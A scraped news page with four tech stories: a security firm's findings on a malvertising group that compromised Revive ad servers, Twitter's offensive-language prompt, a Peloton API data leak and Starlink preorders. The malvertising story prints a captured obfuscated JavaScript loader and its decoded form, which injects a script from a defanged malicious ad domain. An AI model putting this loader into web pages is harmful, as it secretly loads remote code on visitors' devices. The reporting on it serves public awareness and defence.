Connect with us

Biz & IT

Millions of web surfers are being targeted by a single malvertising group

Published

on

Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious advertisements on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all outward appearances, are benign.

Malvertising is the practice of delivering ads to people as they visit trusted websites. The ads embed JavaScript that surreptitiously exploits software flaws or tries to trick visitors into installing an unsafe app, paying fraudulent computer support fees, or taking other harmful actions. Typically, the scammers behind this Internet scourge pose as buyers and pay ad-delivery networks to display the malicious ads on individual sites.

Going for the jugular

Infiltrating the ad ecosystem by posing as a legitimate buyer requires resources. For one, scammers must invest time learning how the market works and then creating an entity that has a trustworthy reputation. The approach also requires paying money to buy space for the malicious ads to run. That’s not the technique used by a malvertising group that security firm Confiant calls Tag Barnakle.

“Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular—mass compromise of ad serving infrastructure,” Confiant researcher Eliya Stein wrote in a blog post published Monday. “Likely, they’re also able to boast an ROI [return on investment] that would eclipse their rivals as they don’t need to spend a dime to run ad campaigns.”

Over the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for organizations that want to run their own ad server rather than relying on a third-party service. The 120 figure is twice the number of infected Revive servers Confiant found last year.

Once it has compromised an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses client-side fingerprinting to ensure only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques to ensure that they also fly under the radar.

Here’s an overview:

Confiant

When Confiant reported last year on Tag Barnakle, it found the group had infected about 60 Revive servers. The feat allowed the group to distribute ads on more than 360 Web properties. The ads pushed fake Adobe Flash updates that, when run, installed malware on desktop computers.

This time, Tag Barnakle is targeting both iPhone and Android users. Websites that receive an ad through a compromised server deliver highly obfuscated JavaScript that determines if a visitor is using an iPhone or Android device.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

In the event that visitors pass that and other fingerprinting tests, they receive a secondary payload that looks like this:


var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

When decoded, the payload is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

As the de-obfuscated code shows, the ads are served through overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an ad network that security firms including Malwarebytes have long documented as malicious.

When Confiant researchers replayed the Propeller Ads click tracker on the types of devices Tag Barnakle was targeting, they saw ads like these:

Confiant

Tens of millions served

The ads mostly lure targets to an app store listing for fake security, safety, or VPN apps with hidden subscription costs or “siphon off traffic for nefarious ends.”

With ad servers frequently integrated with multiple ad exchanges, the ads have the potential to spread widely through hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the malvertising but the firm believes the number is high.

“If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens if not hundreds of millions of devices,” Stein wrote. “This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence.”

Continue Reading

Biz & IT

Twitter’s latest robo-nag will flag “harmful” language before you post

Published

on

Enlarge / Before you tweet, you might be asked if you meant to be so rude.

Want to know exactly what Twitter’s fleet of text-combing, dictionary-parsing bots defines as “mean”? Starting any day now, you’ll have instant access to that data—at least, whenever a stern auto-moderator says you’re not tweeting politely.

On Wednesday, members of Twitter’s product-design team confirmed that a new automatic prompt will begin rolling out for all Twitter users, regardless of platform and device, that activates when a post’s language crosses Twitter’s threshold of “potentially harmful or offensive language.” This follows a number of limited-user tests of the notices beginning in May of last year. Soon, any robo-moderated tweets will be interrupted with a notice asking, “Want to review this before tweeting?”

Earlier tests of this feature, unsurprisingly, had their share of issues. “The algorithms powering the [warning] prompts struggled to capture the nuance in many conversations and often didn’t differentiate between potentially offensive language, sarcasm, and friendly banter,” Twitter’s announcement states. The news post clarifies that Twitter’s systems now account for, among other things, how often two accounts interact with each other—meaning, I’ll likely get a flag for sending curse words and insults to a celebrity I never talk to on Twitter, but I would likely be in the clear sending those same sentences via Twitter to friends or Ars colleagues.

Additionally, Twitter admits that its systems previously needed updates to “account for situations in which language may be reclaimed by underrepresented communities and used in non-harmful ways.” We hope the data points used to make those determinations don’t go so far as to check a Twitter account’s profile photo, especially since troll accounts typically use fake or stolen images. (Twitter has yet to clarify how it makes determinations for these aforementioned “situations.”)

As of press time, Twitter isn’t providing a handy dictionary for users to peruse—or cleverly misspell their favorite insults and curses in order to mask them from Twitter’s auto-moderation tools.

So, two-thirds kept it real, then?

To sell this nag-notice news to users, Twitter pats itself on the back in the form of data, but it’s not entirely convincing.

During the kindness-notice testing phase, Twitter says one-third of users elected to either rephrase their flagged posts or delete them, while anyone who was flagged began posting 11 percent fewer “offensive” posts and replies, as averaged out. (Meaning, some users may have become kinder, while others could have become more resolute in their weaponized speech.) That all sounds like a massive majority of users remaining steadfast in their personal quest to tell it like it is.

Twitter’s weirdest data point is that anyone who received a flag was “less likely to receive offensive and harmful replies back.” It’s unclear what point Twitter is trying to make with that data: why should any onus of politeness land on those who receive nasty tweets?

This follows another nag-notice initiative by Twitter, launched in late 2020, to encourage users to “read” an article linked by another Twitter user before “re-tweeting” it. In other words: if you see a juicy headline and slap the RT button, you could unwittingly share something you may not agree with. Yet this change seems like an undersized bandage to a bigger Twitter problem: how the service incentivizes rampant, timely use of the service in a search for likes and interactions, honesty and civility be damned.

And no nag notice will likely fix Twitter’s struggles with how inauthentic actors and trolls continue to game the system and poison the site’s discourse. The biggest example remains an issue found when clicking through to heavily “liked” and replied posts, usually from high-profile or “verified” accounts. Twitter commonly bumps drive-by posts to the top of these threads’ replies, often from accounts with suspicious activity and lack of organic interactions.

Perhaps Twitter could take the lessons from this nag notice roll-out to heart, particularly about weighting interactions based on a confirmed back-and-forth relationship between accounts. Or the company could get rid of all algorithm-driven weighting of posts, especially those that drive nonfollowed content to a user’s feed and go back to the better days of purely chronological content—so that we can more easily shrug our shoulders at the BS.

Continue Reading

Biz & IT

Data leak makes Peloton’s Horrible, No-Good, Really Bad Day even worse

Published

on

Peloton

Peloton is having a rough day. First, the company recalled two treadmill models following the death of a 6-year-old child who was pulled under one of the devices. Now comes word Peloton exposed sensitive user data, even after the company knew about the leak. No wonder the company’s stock price closed down 15 percent on Wednesday.

Peloton provides a line of network-connected stationary bikes and treadmills. The company also offers an online service that allows users to join classes, work with trainers, or do workouts with other users. In October, Peloton told investors it had a community of 3 million members. Members can set accounts to be public so friends can view details such as classes attended and workout stats, or users can choose for profiles to be private.

I know where you worked out last summer

Researchers at security consultancy Pen Test Partners on Wednesday reported that a flaw in Peloton’s online service was making data for all of its users available to anyone anywhere in the world, even when a profile was set to private. All that was required was a little knowledge of the faulty programming interfaces that Peloton uses to transmit data between devices and the company’s servers.

Data exposed included:

  • User IDs
  • Instructor IDs
  • Group Membership
  • Workout stats
  • Gender and age
  • Weight
  • If they are in the studio or not

Ars agreed to withhold another piece of personal data exposed because Peloton is still working to secure it.

A blog post Pen Test Partners published on Wednesday said that the APIs required no authentication before providing the information. Company researchers said that they reported the exposure to Peloton in January and promptly received an acknowledgement. Then, Wednesday’s post said, Peloton went silent.

Slow response, botched fix

Two weeks later, the researchers said, the company silently provided a partial fix. Rather than providing the user data with no authentication required at all, the APIs made the data available only to those who had an account. The change was better than nothing, but it still let anyone who subscribed to the online service obtain private details of any other subscriber.

When Pen Test Partners informed Peloton of the inadequate fix, they say they got no response. Pen Text Partners researcher Ken Munro said he went as far as looking up company executives on LinkedIn. The researchers said the fix came only after TechCrunch reporter Zack Whittaker, who first reported the leak, inquired about it.

“I was pretty pissed by this point, but figured it was worth one last shot before dropping an 0-day on Peloton users,” Munro told me. “I asked Zack W to hit up their press office. That had a miraculous effect – within hours I had an email from their new CISO, who was new in post and had investigated, found their rather weak response and had a plan to fix the bugs.”

A Peloton representative declined to discuss the timeline on the record but did provide the following canned response:

It’s a priority for Peloton to keep our platform secure and we’re always looking to improve our approach and process for working with the external security community. Through our Coordinated Vulnerability Disclosure program, a security researcher informed us that he was able to access our API and see information that’s available on a Peloton profile. We took action and addressed the issues based on his initial submissions, but we were slow to update the researcher about our remediation efforts. Going forward, we will do better to work collaboratively with the security research community and respond more promptly when vulnerabilities are reported. We want to thank Ken Munro for submitting his reports through our CVD program and for being open to working with us to resolve these issues.

The incident is the latest reminder that data stored online is often free for the taking, even when companies say it isn’t. This puts people in a bind. On the one hand, sharing weight, workout stats, and other data can often help users get the most out of training sessions or group workouts. On the other… well, you know.

I generally try to falsify much of the data I provide. Most of the services I use that require a credit card will approve purchases just fine even when I supply a false name, address, and phone number. Not having those details attached to user names or other data can often minimize the sting of a data leak like this one.

Continue Reading

Biz & IT

Starlink can serve 500,000 users easily, several million “more of a challenge”

Published

on

Enlarge / Screenshot from the Starlink order page, with the street address blotted out.

SpaceX has received more than 500,000 orders for Starlink broadband service, the company said yesterday.

“‘To date, over half a million people have placed an order or put down a deposit for Starlink,’ SpaceX operations engineer Siva Bharadvaj said during the launch webcast of its 26th Starlink mission,” CNBC reported.

SpaceX opened preorders for Starlink satellite service in February and is serving at least 10,000 users in its beta in the US and overseas combined. The preorders required a $99 deposit for service that would be available in the second half of this year. The 500,000 total orders presumably include both US residents and people in other countries; we asked SpaceX for more details and will update this article if we get a response.

A preorder doesn’t guarantee that you’ll get service, and slots are limited in each geographic region because of capacity limits. Still, SpaceX CEO Elon Musk said he expects all of the preorderers to get service—but said that SpaceX will face a challenge if it gets millions of orders.

“Only limitation is high density of users in urban areas,” Musk tweeted yesterday. “Most likely, all of the initial 500k will receive service. More of a challenge when we get into the several million user range.”

The total cost for each Starlink user is $499 for hardware, $50 for shipping and handling, and $99 for monthly service, plus tax. Preorders are still open on the Starlink website.

SpaceX prepares for up to 5 million users in US

Despite Musk’s comment, SpaceX has been laying the groundwork to potentially serve up to 5 million subscribers in the US. SpaceX initially obtained a Federal Communications Commission license to deploy up to 1 million user terminals (i.e. satellite dishes) in the US and later asked the FCC to increase the authorized amount to 5 million terminals. The application is still pending.

“SpaceX Services requests this increase in authorized units due to the extraordinary demand for access to the Starlink non-geostationary orbit satellite system,” the company told the FCC in its license-change request on July 31, 2020. At that time, nearly 700,000 people in the US had registered interest on Starlink’s website, but that action didn’t require putting down any money. The 500,000 orders and deposits that Starlink has received even without saying exactly when the service will exit beta is a stronger indication of people’s interest in the satellite broadband system, though this number likely includes non-US residents.

Musk has said that Starlink will be available to “most of Earth” by the end of 2021 and the whole planet by next year. SpaceX is also planning a new version of the “Dishy McFlatface” satellite dish for large vehicles, aircraft, and ships. Musk has said that the original version of the dish “should be fully mobile later this year, so you can move it anywhere or use it on an RV or truck in motion.”

Continue Reading

Trending